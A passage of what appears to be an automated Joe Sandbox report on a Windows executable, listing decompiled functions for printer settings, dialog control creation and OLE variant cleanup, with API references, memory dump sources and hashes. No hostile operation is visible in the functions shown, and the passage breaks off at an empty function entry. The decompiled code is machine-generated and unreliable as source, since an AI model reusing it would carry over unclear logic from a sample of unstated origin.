                                                                                                                            • Opcode Fuzzy Hash: 3d3060fb26535642c13925da711d5ad474a37dc8069eb91f89b5668fafdf6279
                                                                                                                            • Instruction Fuzzy Hash: 58C11BB0A0020AEFDB10DFA4C9849AEB7B9FF48304F50452EF515EB251D7B9DA91CB64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402AAA Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E00402AAA(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E0040E03B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0040E03B( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                                            0x00402aad
                                                                                                                            0x00402aaf
                                                                                                                            0x00402ab1
                                                                                                                            0x00402ab9
                                                                                                                            0x00402ad3
                                                                                                                            0x00402adb
                                                                                                                            0x00402ae5
                                                                                                                            0x00402aec
                                                                                                                            0x00402aee
                                                                                                                            0x00402af3
                                                                                                                            0x00402af6
                                                                                                                            0x00402af6
                                                                                                                            0x00402b0d
                                                                                                                            0x00402b14
                                                                                                                            0x00402b2c
                                                                                                                            0x00402b31
                                                                                                                            0x00402b36
                                                                                                                            0x00402b36
                                                                                                                            0x00402b3c
                                                                                                                            0x00402b3c
                                                                                                                            0x00402aec
                                                                                                                            0x00402b41
                                                                                                                            0x00402b45

                                                                                                                            APIs
                                                                                                                            • GlobalLock.KERNEL32 ref: 00402AC7
                                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 00402AD3
                                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00402AE5
                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00402B05
                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00402B0D
                                                                                                                            • GlobalLock.KERNEL32 ref: 00402B17
                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00402B24
                                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00402B3C
                                                                                                                              • Part of subcall function 0040E03B: GlobalFlags.KERNEL32(?), ref: 0040E046
                                                                                                                              • Part of subcall function 0040E03B: GlobalUnlock.KERNEL32(?,?,00000000,00402B36,?,00000000,?,?,00000000,00000000,00000002), ref: 0040E058
                                                                                                                              • Part of subcall function 0040E03B: GlobalFree.KERNEL32 ref: 0040E063
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 168474834-0
                                                                                                                            • Opcode ID: 9ec3f5300ee50ba7d03442665b509cbeab668511a8d96bc2cbced0cb3d2b5c32
                                                                                                                            • Instruction ID: f9975800bd9686523497f2c058b531839f10aab633cb7692924e707d79130f7a
                                                                                                                            • Opcode Fuzzy Hash: 9ec3f5300ee50ba7d03442665b509cbeab668511a8d96bc2cbced0cb3d2b5c32
                                                                                                                            • Instruction Fuzzy Hash: 8711A371500600BBDB216F76CC89C6FBBBDFF89744B00052AFA01E11A1D679DD41DB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040417C Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 62%
                                                                                                                            			E0040417C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x441590; // 0x4917eadc
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E0041E981(E004311B4, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E0040DB69(_t246 + 0x28, E0040E967());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E00402521(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E00411C37(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E004035F0(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E0041781C(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E0040FACA(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E00410067( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E00411250( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E004040DB(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E00417B7E(_t190, _t246 - 0x5c, _t233, _t240, 1);
					E00402C55( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E0041D773(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

































                                                                                                                            0x00404180
                                                                                                                            0x00404184
                                                                                                                            0x0040418b
                                                                                                                            0x0040418e
                                                                                                                            0x00404195
                                                                                                                            0x004041a1
                                                                                                                            0x004041a4
                                                                                                                            0x004041a7
                                                                                                                            0x004041ad
                                                                                                                            0x004041b3
                                                                                                                            0x004041b6
                                                                                                                            0x004041b9
                                                                                                                            0x004041bc
                                                                                                                            0x004041c4
                                                                                                                            0x004041ca
                                                                                                                            0x004041d1
                                                                                                                            0x004041db
                                                                                                                            0x004041e3
                                                                                                                            0x004041eb
                                                                                                                            0x004041ee
                                                                                                                            0x004041f2
                                                                                                                            0x004041f6
                                                                                                                            0x004041f9
                                                                                                                            0x004041f9
                                                                                                                            0x004041fc
                                                                                                                            0x00404204
                                                                                                                            0x0040420e
                                                                                                                            0x0040421d
                                                                                                                            0x00404220
                                                                                                                            0x00404223
                                                                                                                            0x00404226
                                                                                                                            0x0040422c
                                                                                                                            0x00404234
                                                                                                                            0x00404236
                                                                                                                            0x00404238
                                                                                                                            0x0040423c
                                                                                                                            0x00404241
                                                                                                                            0x00404245
                                                                                                                            0x0040424b
                                                                                                                            0x0040424d
                                                                                                                            0x0040424f
                                                                                                                            0x00404252
                                                                                                                            0x00404252
                                                                                                                            0x00404241
                                                                                                                            0x00404255
                                                                                                                            0x00404262
                                                                                                                            0x0040426f
                                                                                                                            0x00404272
                                                                                                                            0x00404275
                                                                                                                            0x00404278
                                                                                                                            0x0040427b
                                                                                                                            0x00404289
                                                                                                                            0x0040428b
                                                                                                                            0x0040428b
                                                                                                                            0x0040428e
                                                                                                                            0x00404293
                                                                                                                            0x00404296
                                                                                                                            0x00404299
                                                                                                                            0x0040431f
                                                                                                                            0x0040431f
                                                                                                                            0x00404322
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040429f
                                                                                                                            0x0040429f
                                                                                                                            0x0040429f
                                                                                                                            0x004042a1
                                                                                                                            0x004042a5
                                                                                                                            0x004042a8
                                                                                                                            0x004042ac
                                                                                                                            0x004042b2
                                                                                                                            0x004042b5
                                                                                                                            0x004042ec
                                                                                                                            0x004042f2
                                                                                                                            0x004042f5
                                                                                                                            0x004042f7
                                                                                                                            0x004042fb
                                                                                                                            0x0040430d
                                                                                                                            0x0040430d
                                                                                                                            0x004042fd
                                                                                                                            0x00404306
                                                                                                                            0x00404306
                                                                                                                            0x0040430f
                                                                                                                            0x00404313
                                                                                                                            0x004042b7
                                                                                                                            0x004042b9
                                                                                                                            0x004042bc
                                                                                                                            0x004042c1
                                                                                                                            0x004042c8
                                                                                                                            0x004042cb
                                                                                                                            0x004042d3
                                                                                                                            0x004042d8
                                                                                                                            0x004042db
                                                                                                                            0x004042de
                                                                                                                            0x004042e5
                                                                                                                            0x004042e5
                                                                                                                            0x00404316
                                                                                                                            0x0040431c
                                                                                                                            0x00000000
                                                                                                                            0x00404329
                                                                                                                            0x00404329
                                                                                                                            0x00404329
                                                                                                                            0x0040432c
                                                                                                                            0x00404333
                                                                                                                            0x00404334
                                                                                                                            0x00404335
                                                                                                                            0x0040433f
                                                                                                                            0x00404337
                                                                                                                            0x00404337
                                                                                                                            0x00404337
                                                                                                                            0x00404345
                                                                                                                            0x00404347
                                                                                                                            0x00404348
                                                                                                                            0x0040434e
                                                                                                                            0x0040434f
                                                                                                                            0x00404352
                                                                                                                            0x00404366
                                                                                                                            0x0040436a
                                                                                                                            0x0040436d
                                                                                                                            0x0040436f
                                                                                                                            0x00404371
                                                                                                                            0x00404374
                                                                                                                            0x0040437d
                                                                                                                            0x00404386
                                                                                                                            0x004043c5
                                                                                                                            0x004043d9
                                                                                                                            0x004043e5
                                                                                                                            0x004043f8
                                                                                                                            0x00404404
                                                                                                                            0x00404411
                                                                                                                            0x0040441d
                                                                                                                            0x0040441d
                                                                                                                            0x00404386
                                                                                                                            0x00404426
                                                                                                                            0x0040442b
                                                                                                                            0x0040442b
                                                                                                                            0x00404431
                                                                                                                            0x00404436
                                                                                                                            0x0040447e
                                                                                                                            0x00404438
                                                                                                                            0x00404440
                                                                                                                            0x00404442
                                                                                                                            0x00404442
                                                                                                                            0x00404446
                                                                                                                            0x0040444a
                                                                                                                            0x00404455
                                                                                                                            0x0040445f
                                                                                                                            0x00404467
                                                                                                                            0x00404468
                                                                                                                            0x00404469
                                                                                                                            0x00404478
                                                                                                                            0x00404478

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 00404195
                                                                                                                            • MapDialogRect.USER32(?,00000000), ref: 00404226
                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 00404245
                                                                                                                            • CLSIDFromString.OLE32(?,?,00000000), ref: 00404337
                                                                                                                              • Part of subcall function 00402521: _malloc.LIBCMT ref: 0040253B
                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000), ref: 0040433F
                                                                                                                            • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 004043D9
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0040442B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2841959276-0
                                                                                                                            • Opcode ID: e8532b29d0fd183fa62ba425212639ac9896854a894be4d807275f163d140fd2
                                                                                                                            • Instruction ID: 44de4d634650cbe630941da48d7c2e4863df4f9a9f644875e82316976c0dd5c0
                                                                                                                            • Opcode Fuzzy Hash: e8532b29d0fd183fa62ba425212639ac9896854a894be4d807275f163d140fd2
                                                                                                                            • Instruction Fuzzy Hash: 45B106B1900209AFCB04DFA9C984AEE77B4FF48314F00412AFD19A7390E738D994CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416876 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E00416876(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E0041E981(E00431D3B, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E0041EA59(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E00403A5E(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E0041EC90(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E0041A21A(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E0041635F(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E0041A1FA(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x43487c);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x437aec, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}














                                                                                                                            0x00416876
                                                                                                                            0x00416876
                                                                                                                            0x0041687d
                                                                                                                            0x00416882
                                                                                                                            0x00416889
                                                                                                                            0x00416890
                                                                                                                            0x00416893
                                                                                                                            0x00416896
                                                                                                                            0x004169fc
                                                                                                                            0x004169fc
                                                                                                                            0x00416a07
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041689c
                                                                                                                            0x0041689c
                                                                                                                            0x004168a2
                                                                                                                            0x004168a5
                                                                                                                            0x004168ab
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004168b1
                                                                                                                            0x004168b6
                                                                                                                            0x004168b9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004168c5
                                                                                                                            0x004168c8
                                                                                                                            0x004168d8
                                                                                                                            0x004168e2
                                                                                                                            0x004168e9
                                                                                                                            0x004168ee
                                                                                                                            0x004168f5
                                                                                                                            0x004168fa
                                                                                                                            0x004168fe
                                                                                                                            0x00416902
                                                                                                                            0x00416937
                                                                                                                            0x00416937
                                                                                                                            0x00416904
                                                                                                                            0x0041690f
                                                                                                                            0x00416918
                                                                                                                            0x0041691c
                                                                                                                            0x00416925
                                                                                                                            0x00416929
                                                                                                                            0x0041692f
                                                                                                                            0x0041692f
                                                                                                                            0x0041693a
                                                                                                                            0x00416940
                                                                                                                            0x00416946
                                                                                                                            0x00416949
                                                                                                                            0x0041694c
                                                                                                                            0x00416952
                                                                                                                            0x00416957
                                                                                                                            0x0041695b
                                                                                                                            0x0041695e
                                                                                                                            0x0041695f
                                                                                                                            0x00416964
                                                                                                                            0x00416969
                                                                                                                            0x0041696b
                                                                                                                            0x0041697a
                                                                                                                            0x0041698e
                                                                                                                            0x00416991
                                                                                                                            0x00416997
                                                                                                                            0x0041699a
                                                                                                                            0x004169a5
                                                                                                                            0x004169aa
                                                                                                                            0x004169aa
                                                                                                                            0x004169b4
                                                                                                                            0x004169b9
                                                                                                                            0x004169b9
                                                                                                                            0x004169c3
                                                                                                                            0x004169c8
                                                                                                                            0x004169c8
                                                                                                                            0x004169ce
                                                                                                                            0x004169d1
                                                                                                                            0x004169d1
                                                                                                                            0x00416969
                                                                                                                            0x004169d5
                                                                                                                            0x004169dd
                                                                                                                            0x004169e3
                                                                                                                            0x004169ed
                                                                                                                            0x004169ed
                                                                                                                            0x004169f3
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041687D
                                                                                                                            • _memset.LIBCMT ref: 004168E9
                                                                                                                              • Part of subcall function 0041A21A: _memset.LIBCMT ref: 0041A222
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00416929
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004169AA
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004169B9
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004169C8
                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 004169DD
                                                                                                                              • Part of subcall function 0041635F: __EH_prolog3.LIBCMT ref: 0041637B
                                                                                                                              • Part of subcall function 0041635F: VariantClear.OLEAUT32(?), ref: 004163E0
                                                                                                                              • Part of subcall function 0041A1FA: VariantCopy.OLEAUT32(?,?), ref: 0041A208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2905758408-0
                                                                                                                            • Opcode ID: 376fae095a17b67b1a918175da4771b660408b27e79395c080a363fab994104b
                                                                                                                            • Instruction ID: 1434d0363269438ee20876f373ea42b04e5dd12660e47d061d590743b4d9a814
                                                                                                                            • Opcode Fuzzy Hash: 376fae095a17b67b1a918175da4771b660408b27e79395c080a363fab994104b
                                                                                                                            • Instruction Fuzzy Hash: 4C5139B1A00209DFDB10DFA4C885BEEBBB8BF08305F10456AE515E7291D779A985CF64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004135F8 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 53%
